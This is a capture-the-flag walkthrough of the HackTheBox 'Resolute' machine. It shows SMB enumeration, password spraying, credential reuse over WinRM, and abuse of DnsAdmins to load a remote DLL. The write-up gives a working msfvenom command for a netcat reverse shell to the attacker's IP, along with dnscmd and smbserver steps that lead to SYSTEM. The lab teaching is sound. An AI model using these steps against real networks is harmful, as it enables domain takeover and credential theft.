HackTheBox - Resolute

10 minute read

Resolute was a fun 30 point box created by egre55. It starts out by finding a set of credentials via SMB enumeration which allows you to password spray and find that the password has been reused, allowing you to login via WinRM and get the user flag. You then find a set of credentials in a PowerShell Transcript file, log in again via WinRM with those credentials, and then finally abuse the user’s group privileges to get root.

User.txt

Nmap


A quick nmap scan reveals the following ports:

# nmap -sT -p- --min-rate 5000 10.10.10.169
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 15:20 EST
Nmap scan report for 10.10.10.169
Host is up (0.017s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm

Focusing on the more important ports we get the following information:

# nmap -sV -sC -T4 -p 53,88,135,139,389,445 10.10.10.169

PORT    STATE SERVICE      VERSION
53/tcp  open  domain?
| fingerprint-strings:    
|   DNSVersionBindReqTCP: 
|     version                        
|_    bind             
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-11 20:33:30Z)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)

Host script results:
|_clock-skew: mean: 2h46m57s, deviation: 4h37m09s, median: 6m56s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-01-11T12:34:03-08:00 
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required 
| smb2-time: 
|   date: 2020-01-11T20:34:05
|_  start_date: 2020-01-11T11:05:42


SMB


Running nullinux with the -users flag presents you with a list of users and their associated group memberships:

# nullinux -users 10.10.10.169 

[*] Enumerating Domain Information for: 10.10.10.169
[+] Domain Name: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436

[*] Enumerating querydispinfo for: 10.10.10.169
    abigail
    Administrator
    angela
    annette
    annika
    claire
    claude
    DefaultAccount
    felicia
    fred
    Guest
    gustavo
    krbtgt
    marcus
    marko
    melanie
    naoki
    paulo
    per
    ryan
    sally
    simon
    steve
    stevie
    sunita
    ulf
    zach

[*] Enumerating enumdomusers for: 10.10.10.169
    Administrator
    Guest
    krbtgt
    DefaultAccount
    ryan
    marko
    sunita
    abigail
    marcus
    sally
    fred
    angela
    felicia
    gustavo
    ulf
    stevie
    claire
    paulo
    steve
    annette
    annika
    per
    claude
    melanie
    zach
    simon
    naoki

[*] Enumerating LSA for: 10.10.10.169

[*] Performing RID Cycling for: 10.10.10.169

[*] Testing 10.10.10.169 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.169
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
    Administrator
[+] Group: Domain Users
    Administrator
    DefaultAccount
    krbtgt
    ryan
    marko
    sunita
    abigail
    marcus
    sally
    fred
    angela
    felicia
    gustavo
    ulf
    stevie
    claire
    paulo
    steve
    annette
    annika
    per
    claude
    melanie
    zach
    simon
    naoki
[+] Group: Domain Guests
    Guest
[+] Group: Domain Computers
    MS02$
[+] Group: Domain Controllers
    RESOLUTE$
[+] Group: Schema Admins
    Administrator
[+] Group: Enterprise Admins
    Administrator
[+] Group: Group Policy Creator Owners
    Administrator
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Contractors
    ryan

Make note of the user ryan in the Contractors group.

Further enumerating SMB I decided to run enum4linux, it provided some interesting information in the account description field of one of the users:

# enum4linux -a 10.10.10.169

 =============================          
|    Users on 10.10.10.169    |      
 =============================    
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
<REDACTED>
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)        
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!    
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)         
<REDACTED>

You can see the marko account Desc contains Account created. Password set to Welcome123!.


Password Spraying


Obviously the credentials marko / Welcome123! didn’t work for any of the services (Kerberos, SMB, and WinRM), maybe we can password spray with crackmapexec and see if there is any password reuse in place.

I added all the users from the nullinux output into a file and parsed it to the -u flag with crackmapexec:

# crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'
CME          10.10.10.169:445 RESOLUTE        [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:MEGABANK)
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\Administrator:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\krbtgt:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\ryan:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\marko:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\sunita:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\abigail:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\marcus:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\sally:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\fred:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\angela:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\felicia:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\gustavo:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\ulf:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\stevie:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\claire:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\paulo:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\steve:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\annette:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\annika:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\per:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE 
CME          10.10.10.169:445 RESOLUTE        [+] MEGABANK\melanie:Welcome123!
[*] KTHXBYE!

You can see the credentials melanie / Welcome123! succeeded.


Flag


You can simply WinRM into resolute and type the user flag:

# evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\desktop> type user.txt
0c3be4...


Root.txt

PowerShell Transcripts


Running dir -Force allows you to list hidden files and directories:

*Evil-WinRM* PS C:\> dir -force

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d-----        9/25/2019   6:19 AM                PerfLogs
d-r---        9/25/2019  12:39 PM                Program Files
d-----       11/20/2016   6:36 PM                Program Files (x86)
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
d-r---        12/4/2019   2:46 AM                Users
d-----        12/4/2019   5:15 AM                Windows
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/29/2020   3:47 AM      402653184 pagefile.sys

You’ll notice a PSTranscripts directory in C:\. PowerShell Transcripts allow you to record all/part of a PowerShell session to a text file, including all the commands the user typed as well as any output that appeared on the console.

The PSTranscripts directory contains another hidden directory:

*Evil-WinRM* PS C:\PSTranscripts> dir -force

    Directory: C:\PSTranscripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203

Changing directory and checking for more hidden files, we can see the following transcript is present:

*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force

    Directory: C:\PSTranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

The file contains some interesting information but the main line that stands out is shown below:

>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!


Shell as Ryan


With Ryan’s credentials we can simply login again via WinRM:

# evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan


Groups


Running whoami /all as ryan presents some interesting output, particularly in the GROUP INFORMATION section:

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

<REDACTED>

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== =============================================================== 
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group 
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


<REDACTED>

You can see that ryan is a member of Contractors and DnsAdmins.

The DnsAdmins group has a well known vulnerability that allows a user to load a remote DLL to the dns service binary and achieve code execution. A great article from ired.team can be found here, it describes the exploitation process in a simple and concise manner.


Nested Groups


It appears Contractors is a nested group, this can be confirmed with the following command:

*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins'

distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local
name              : Contractors
objectClass       : group
objectGUID        : 9f2ff7be-f805-491f-aff1-3653653874d7
SamAccountName    : Contractors
SID               : S-1-5-21-1392959593-3013219662-3596683436-1103

Contractors is nested with the DnsAdmins group, and ryan is a member of Contractors, so he essentially has DnsAdmins group privileges. The easy way to show nested group members is by using the -Recursive flag:

*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins' -Recursive

distinguishedName : CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
name              : Ryan Bertrand
objectClass       : user
objectGUID        : 848c83e3-6cbe-4d3e-bacf-aa7bd37da691
SamAccountName    : ryan
SID               : S-1-5-21-1392959593-3013219662-3596683436-1105

With that confirmed let’s move on to the dns service itself.


dns service


Before attempting the exploit I wanted to check the permissions our user has over the dns service by gettting the SDDL security descriptor:

C:\>sc sdShow dns

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105) 

I created a short post recently covering SDDL security descriptors, in particular for service permissions. The ACE structure is as follows:

(ace_type; ace_flags; rights; object_guid; inherit_object_guid; account_sid)

You’ll notice the SID in the last ACE matches Ryan Bertrand’s SID:

(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)

The following table contains the rights for the service:

Symbol Right
CC SERVICE_QUERY_CONFIG
LC SERVICE_QUERY_STATUS
SW SERVICE_ENUMERATE_DEPENDENTS
RP SERVICE_START
WP SERVICE_STOP
DT SERVICE_PAUSE_CONTINUE
LO SERVICE_INTERROGATE
RC READ_CONTROL

Comparing the rights from the ACE to the table values we can understand the privileges a user has over a service, the most important rights in this instance are the ability to stop and start the dns service.


DnsAdmins


As described by Microsoft:

Members of DNSAdmins group have access to network DNS information. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group exists only if the DNS server role is or was once installed on a domain controller in the domain.

The management of the DNS service is done using the DNS Server Management Protocol:

The Domain Name Service (DNS) Server Management Protocol defines RPC interfaces that provide methods for remotely accessing and administering a DNS server. It is a client/server protocol based on RPC that is used in the configuration, management, and monitoring of a DNS server.

The Microsoft tool dnscmd is a command-line interface for managing DNS servers. This tool will allow us to make a specific change to the DNS server’s /serverlevelplugindll parameter, which specifies the path of a custom plug-in.

The syntax is /serverlevelpluginddl <dllpath>, with the dllpath specifiying the fully qualified path name of a valid DNS server plug-in. We can parse a UNC path to this parameter, allowing us to load a custom DLL from our remote host.

The following article was written by Shay Ber and describes the attack in great detail, it can be found here.


Exploiting DnsAdmins


Refering to the ired.team article, the exploit process I used is shown below.

First, I uploaded nc64.exe to a world writable directory - C:\programdata. I then created a simple DLL with msfvenom that runs a nc reverse shell:

# msfvenom -p windows/x64/exec cmd='C:\programdata\nc64.exe 10.10.14.45 443 -e cmd.exe' -f dll > nc.dll

Next, I configured the dns service to use this new remote DLL located on my attacking host (using the FQDN from running Get-ADComputer -Filter *):

dnscmd Resolute.megabank.local /config /serverlevelplugindll \\10.10.14.45\reso\nc.dll

After that you can double check it configured successfully:

Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

ServerLevelPluginDll : \\10.10.14.45\reso\nc.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ 
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry

I then started a local SMB server using the smbserver.py script from Impacket (making sure the nc.dll is in the correct share):

# python smbserver.py reso /root/reso

Then you simply need to stop and start the dns service:

sc.exe \\Resolute.megabank.local stop dns
sc.exe query dns 
sc.exe \\Resolute.megabank.local start dns

You should receive output like the following in the smbserver.py terminal:

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,53729)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:7e044e15e6bafcdee2496aec467f2908:0101000000000000808bb4567fc9d501f473f5841e6b768a00000000010010006a0079004500510043006a0064006b000200 
100079006c0073004c00610049004c006d00030010006a0079004500510043006a0064006b000400100079006c0073004c00610049004c006d0007000800808bb4567fc9d5010600040002000000080030003000000000 
000000000000000040000014da554f47382d1774e0f1ec3fb500b69d0e2a875f126a359ad6d37aef84b82b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e0031003000 
2e00310034002e00340035000000000000000000 
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:RESO)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,53729)
[*] Remaining connections []

This confirms that the dns service has hit our smbserver and grabbed the DLL. You should then receive a netcat reverse shell fairly quickly:

# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.169] 56589
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system


Flag


With a shell as SYSTEM you can simply type the root flag:

C:\Users\Administrator\Desktop>type root.txt
type root.txt
e1d948...